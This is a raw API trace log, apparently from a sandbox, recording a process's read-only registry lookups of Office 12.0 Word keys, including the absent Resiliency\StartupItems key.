[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.252] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.252] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.252] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.252] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.252] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.252] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.252] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.253] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.253] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.254] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x0) returned 0x2
[0086.254] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.254] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x3f0) returned 0x0
[0086.254] RegQueryInfoKeyW (in: hKey=0x3f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.254] RegOpenKeyExW (in: hKey=0x3f0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x3a0) returned 0x0
[0086.254] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.254] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.254] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x3f0) returned 0x0
[0086.254] RegCloseKey (hKey=0x3a0) returned 0x0
[0086.254] RegQueryInfoKeyW (in: hKey=0x3f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.254] RegOpenKeyExW (in: hKey=0x3f0, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x3a0) returned 0x0
[0086.255] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.255] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.255] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x3f0) returned 0x0
[0086.255] RegCloseKey (hKey=0x3a0) returned 0x0
[0086.255] RegQueryInfoKeyW (in: hKey=0x3f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.255] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.255] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.255] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x3a0) returned 0x0
[0086.255] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.255] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x420) returned 0x0
[0086.255] RegCloseKey (hKey=0x3a0) returned 0x0
[0086.255] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.255] RegOpenKeyExW (in: hKey=0x420, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x3a0) returned 0x0
[0086.255] RegCloseKey (hKey=0x420) returned 0x0
[0086.255] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.256] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x420) returned 0x0
[0086.256] RegCloseKey (hKey=0x3a0) returned 0x0
[0086.256] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.256] RegOpenKeyExW (in: hKey=0x420, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x3a0) returned 0x0
[0086.256] RegCloseKey (hKey=0x420) returned 0x0
[0086.256] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.256] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.256] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.256] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x0) returned 0x2
[0086.256] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.256] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x420) returned 0x0
[0086.256] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.256] RegOpenKeyExW (in: hKey=0x420, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x34c) returned 0x0
[0086.256] RegCloseKey (hKey=0x420) returned 0x0
[0086.256] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.257] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x420) returned 0x0
[0086.257] RegCloseKey (hKey=0x34c) returned 0x0
[0086.257] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.257] RegOpenKeyExW (in: hKey=0x420, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x34c) returned 0x0
[0086.257] RegCloseKey (hKey=0x420) returned 0x0
[0086.257] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.257] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x420) returned 0x0
[0086.257] RegCloseKey (hKey=0x34c) returned 0x0
[0086.257] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.257] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.257] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.257] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x34c) returned 0x0
[0086.257] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.257] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.258] RegCloseKey (hKey=0x34c) returned 0x0
[0086.258] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.258] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x34c) returned 0x0
[0086.258] RegCloseKey (hKey=0x35c) returned 0x0
[0086.258] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.259] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.259] RegCloseKey (hKey=0x34c) returned 0x0
[0086.259] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.259] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x34c) returned 0x0
[0086.259] RegCloseKey (hKey=0x35c) returned 0x0
